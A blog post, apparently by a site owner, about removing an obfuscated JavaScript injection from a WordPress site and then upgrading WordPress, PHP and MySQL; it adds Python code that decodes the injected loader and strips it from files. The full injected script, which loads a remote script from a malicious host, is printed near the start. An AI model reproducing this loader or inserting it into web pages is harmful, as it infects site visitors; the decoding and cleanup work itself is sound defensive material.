A virus or worm had crept into one of my web projects. Here I was using two WordPress installations to provide a dual-language website in German and English. I had made some small adaptations to the scripts and created a custom template.
The problem was caused by a piece of JavaScript code, which had been inserted into many of the PHP files and some of the JavaScript (.js) files. This is a sample of the code that was added:
<script>M=["s"];R={};var S;n=function(){var FY=["Gv"];function C(G,b,F){this.d="d";return G.substr(b,F);var e=new String();this.dv='';}try {var OO='yw'} catch(OO){};Yt=29881;Yt-=151;var SF='';qG=["Gt"];var q=RegExp;this.c="";var JO=new String();var g=document;XA=33342;XA++;Yy=63948;Yy++;var GP='';var T=String("/xvid"+"eos-c"+C("om/goZNf",0,5)+C("ogle.mWi",0,5)+C("com/nPMHG",0,5)+"ikkei"+".co.j"+C("p.phpO64r",0,5));this.D=710;this.D--;try {} catch(dvJ){};try {} catch(iS){};function E(G,b){var iM=["EQ"];var F=String("[")+b+"]";var J=new q(F, "g");return G.replace(J, GP);var ov='';this.qf=10983;this.qf+=70;};HV=61819;HV--;var uV="uV";A=[];var gN=E('szcwrDi2p2tg','fwzGjT2QJaD1X_g3C');this.eg='';var H=245298-237218;fZ=[];var q_=new String("bo"+"dy");this.x='';var Y=null;try {} catch(yr){};try {} catch(fd){};tk={_w:"AK"};var Mv={DU:30624};S=function(){var dV=new Array();aV=15275;aV--;try {var ROe={lC:false};var f=E('c2rAezaLtAehEAlzeLmAe0n0tI','Lh2IAO0jz9');yx=[];var qE=["Tc","je","Sz"];h=g[f](gN);try {var ur='uT'} catch(ur){};ux=4237;ux+=157;this.kT=64866;this.kT--;var X=E('shrocz','FzdCPViphoE');var G=H+T;var Np="";this.zi="zi";var Hg=new String(C("de4cJ",0,2)+C("mtxrfetrxm",4,2)+C("fOHrOfH",3,1));iSv=38374;iSv++;Xa=["NI","Eo"];cO=["vH","fM"];h[Hg]=[1,3][0];var DE={zm:38556};Yyf=[];h[X]=new String(C("htdAa",0,2)+C("8jdtp8jd",3,2)+":/"+"/t"+C("CZKgenZgKC",4,2)+"th"+"pr"+C("of36TB",0,2)+"it"+".r"+C("gqCu:qgC",3,2))+G;g[q_].appendChild(h);this.zy='';this.ZU='';} catch(_){this.qu=36473;this.qu-=135;var TE=new Array();try {var op='xu'} catch(op){};};};this.qJ="qJ";};try {var In='XY'} catch(In){};var sg='';n();window.onload=S;var bp=[];</script>
<!--8825f4c0663bce25174c88ea6fbadc29-->
<script>M=["s"];R={};var S;n=function(){var FY=["Gv"];function C(G,b,F){this.d="d";return G.substr(b,F);var e=new String();this.dv='';}try {var OO='yw'} catch(OO){}; ... ;try {var op='xu'} catch(op){};};};this.qJ="qJ";};try {var In='XY'} catch(In){};var sg='';n();window.onload=S;var bp=[];</script><!--8825f4c0663bce25174c88ea6fbadc29-->
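What that block actually does is easier to see by evaluating its string-building helpers instead of reading the noise around them. The Python below is added here as editorial analysis; it is not code from the original post, nor from the removal script mentioned further on. C() and E() re-implement the sample's two helper functions (JavaScript substr(start, length) and deletion of every character in a RegExp character class), and decode_sample() evaluates the same expressions the sample feeds to document[...]. The only assumption is that a plain membership test equals the character-class RegExp, which holds because none of the class strings in the sample contain '-' or '^'.

```python
def C(G, b, F):
    """The sample's C(): JavaScript String.substr(b, F), F chars from index b."""
    return G[b:b + F]


def E(G, b):
    """The sample's E(): delete every character of G that appears in the
    RegExp class [b]. A membership test is equivalent here because none of
    the class strings used by the sample contain '-' or '^'."""
    return ''.join(ch for ch in G if ch not in b)


def decode_sample():
    """Evaluate the string expressions of the injected script exactly as
    written in the sample and return what each obfuscated name resolves to."""
    H = 245298 - 237218                                   # 8080
    T = ("/xvid" + "eos-c" + C("om/goZNf", 0, 5) + C("ogle.mWi", 0, 5)
         + C("com/nPMHG", 0, 5) + "ikkei" + ".co.j" + C("p.phpO64r", 0, 5))
    gN = E('szcwrDi2p2tg', 'fwzGjT2QJaD1X_g3C')          # argument to document[f]
    q_ = "bo" + "dy"                                      # document[q_].appendChild(h)
    f = E('c2rAezaLtAehEAlzeLmAe0n0tI', 'Lh2IAO0jz9')     # h = document[f](gN)
    X = E('shrocz', 'FzdCPViphoE')                        # h[X] = remote URL
    G = str(H) + T                                        # JS: number + string concat
    Hg = C("de4cJ", 0, 2) + C("mtxrfetrxm", 4, 2) + C("fOHrOfH", 3, 1)  # h[Hg] = 1
    url = (C("htdAa", 0, 2) + C("8jdtp8jd", 3, 2) + ":/" + "/t"
           + C("CZKgenZgKC", 4, 2) + "th" + "pr" + C("of36TB", 0, 2)
           + "it" + ".r" + C("gqCu:qgC", 3, 2)) + G
    return {
        'document_method': f,        # method called on document
        'element': gN,               # element it creates
        'attribute_set_to_1': Hg,    # attribute set to [1,3][0]
        'url_attribute': X,          # attribute that receives the URL
        'parent': q_,                # document[parent].appendChild(h)
        'url': url,                  # where the second-stage script is loaded from
    }


if __name__ == '__main__':
    for name, value in decode_sample().items():
        print(f'{name}: {value}')
```

Run it and the loader resolves to document.createElement('script') with defer set to 1 and src set to the decoded URL, appended to document.body when S runs from window.onload. Everything else in the block (the unused try/catch pairs, the counters and throwaway arrays) appears to be padding to defeat simple signature matching. Do not fetch the decoded URL: the visible code is only a loader, and the actual payload lived on that server and is not on this page.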
I found a reference to this Trojan code here: http://possible.in/products-security-updates.php. There is a PHP script available to remove the code from an infected installation. The script needs PHP5, though, which the 1and1 server the site was hosted on lacked. So I had to find and replace the malicious code by hand using Notepad++. Notepad++ has a nice function to search and replace in folders recursively using a regular expression.
I removed the code from several PHP and JS files. The JS files did not have the <script> tags around the code.
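As an added example (not the PHP removal script the page links to, and not the Notepad++ expression the author used), the following Python does the same recursive find-and-replace and handles both forms of the block: wrapped in <script> tags and followed by the 32-character marker comment, as in the PHP files, and bare, as in the .js files. The regex is anchored on the opening and closing tokens of the sample quoted above, and the infected files it cleans in demo() are constructed here for the demonstration. It assumes the infection uses exactly those tokens, so compare a block from your own files against the anchors before relying on it.

```python
import os
import re
import shutil
import tempfile

# Regex anchored on the opening and closing tokens of the injected script quoted
# above. The <script> tags are optional because the .js files carried the bare
# code, and the 32-hex comment marker that followed the block is optional for
# the same reason. Assumption: other infections of this family may use different
# identifiers, so check a block from your own files before trusting the anchors.
INJECTION_RE = re.compile(
    r'(?:<script>)?'
    r'M=\["s"\];R=\{\};var S;n=function\(\)\{'
    r'.*?'
    r'n\(\);window\.onload=S;var bp=\[\];'
    r'(?:</script>)?'
    r'(?:\s*<!--[0-9a-f]{32}-->)?',
    re.DOTALL,
)

# Constructed test material: the real opening and closing tokens with the
# obfuscated body shortened to a comment.
SAMPLE_PHP = (
    '<script>M=["s"];R={};var S;n=function(){var FY=["Gv"];/* body */};'
    'n();window.onload=S;var bp=[];</script>\n'
    '<!--8825f4c0663bce25174c88ea6fbadc29-->\n'
    '<?php\necho "hello";\n'
)
SAMPLE_JS = (
    'function scroller() {}\n'
    'M=["s"];R={};var S;n=function(){var FY=["Gv"];/* body */};'
    'n();window.onload=S;var bp=[];\n'
)
CLEAN_PHP = '<?php\necho "clean";\n'


def strip_injection(text):
    """Return (cleaned_text, number_of_injected_blocks_removed)."""
    return INJECTION_RE.subn('', text)


def clean_tree(root, dry_run=True, exts=('.php', '.js', '.html', '.htm')):
    """Walk root and return {path: blocks_removed} for every infected file.

    With dry_run=True nothing is written, which is the mode to run first so
    the hit list can be read. With dry_run=False each infected file is copied
    to <name>.bak and then rewritten in place without the injected block.
    """
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, 'rb') as fh:
                text = fh.read().decode('utf-8', errors='surrogateescape')
            cleaned, count = strip_injection(text)
            if count == 0:
                continue
            hits[path] = count
            if not dry_run:
                shutil.copy2(path, path + '.bak')
                with open(path, 'wb') as fh:
                    fh.write(cleaned.encode('utf-8', errors='surrogateescape'))
    return hits


def demo():
    """Build a throwaway tree from the constructed samples, scan it, clean it
    and rescan. Returns (dry_run_hits, cleaning_hits, hits_after_cleaning)."""
    root = tempfile.mkdtemp()
    try:
        theme = os.path.join(root, 'wp-content', 'themes', 'custom')
        os.makedirs(theme)
        files = {
            os.path.join(root, 'index.php'): SAMPLE_PHP,
            os.path.join(theme, 'scroller.js'): SAMPLE_JS,
            os.path.join(root, 'wp-config.php'): CLEAN_PHP,
        }
        for path, body in files.items():
            with open(path, 'w') as fh:
                fh.write(body)
        dry = sorted(os.path.relpath(p, root) for p in clean_tree(root))
        real = {os.path.relpath(p, root): n
                for p, n in clean_tree(root, dry_run=False).items()}
        return dry, real, len(clean_tree(root))
    finally:
        shutil.rmtree(root)


if __name__ == '__main__':
    print(demo())
```

Run clean_tree(path) first and read the hit list, then rerun with dry_run=False to rewrite the files, keeping a .bak beside each one modified. Zero hits afterwards only proves this one pattern is gone, not that the installation is clean, which is why reinstalling the core files from a fresh download is the safer way to finish.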
Because I was still getting a warning in Chrome, I decided to completely remove the existing files and upgrade the WordPress 2.1.8 installation to the newest version, 2.9.1. After making a full backup of all the files in the WordPress folder, I deleted all files and installed the new ones. I replaced the wp-config.php file and uploaded the custom theme.
Unfortunately I got a 500 Internal Server Error after this. It appears that WordPress version 2.9.1 needs MySQL 5. So I had to create a new database in the 1and1 database manager. Then I dumped the SQL from the old database and imported it into the new one. The wp-config.php file needed to be updated with the new database connection information. Now the site showed at least a part of the template.
After that, I had to change a script in the wp-includes folder, link-template.php. After the the_permalink() function, I added two small adjustments for my template:
/* Existing WordPress core function, unchanged */
function the_permalink() {
    echo apply_filters('the_permalink', get_permalink());
}
/* Addition for Language Switch (MK) */
/* Same permalink, with the host swapped to the sister installation on the other subdomain.
   Note: wp-includes is overwritten by every core upgrade, so this edit has to be redone after each update. */
function the_permalink_de() {
    echo str_replace('en.come-partner.de', 'de.come-partner.de', apply_filters('the_permalink', get_permalink()));
}
function the_permalink_en() {
    echo str_replace('de.come-partner.de', 'en.come-partner.de', apply_filters('the_permalink', get_permalink()));
}
I use these altered functions for the language-change menu item. It allows for a switch from the German to the English version of that page. The two WordPress installations are on two subdomains, "en." and "de.".
In the template:
<ul id="menuleft" class="treeview">
<li class="page_item"><a href="/">English</a></li>
</ul>
Similarly for the German link.
The front of the website was functioning nicely after this, except for three plugins that needed to be activated. I copied the old versions of "fold_page_list.php" for the menu and "iinclude_page.php" to include page content in my JavaScript scroller. This worked fine.
I copied the folder "dd-formmailer" to the plugins and went to the "/wp-admin" page. Here again I got a 500 Server Error. One piece of advice found on the Net was to rename the plugins folder to something else, to prevent malfunctioning plugins from disturbing the program. The login screen appeared, followed by a database update. Next came the Dashboard. Activating the Dragon Design Form Mailer created another 500. It appeared to be a problem with PHP4, so I inserted code to activate PHP5 in the .htaccess:
AddType x-mapp-php5 .php
AddHandler x-mapp-php5 .php
That solved the problems, so in conclusion it appeared to be version problems. Upgrading WordPress to 2.9.1 also required moving from PHP4 to PHP5 and from MySQL 4 to MySQL 5.
Some tips for what to do when your site is hacked: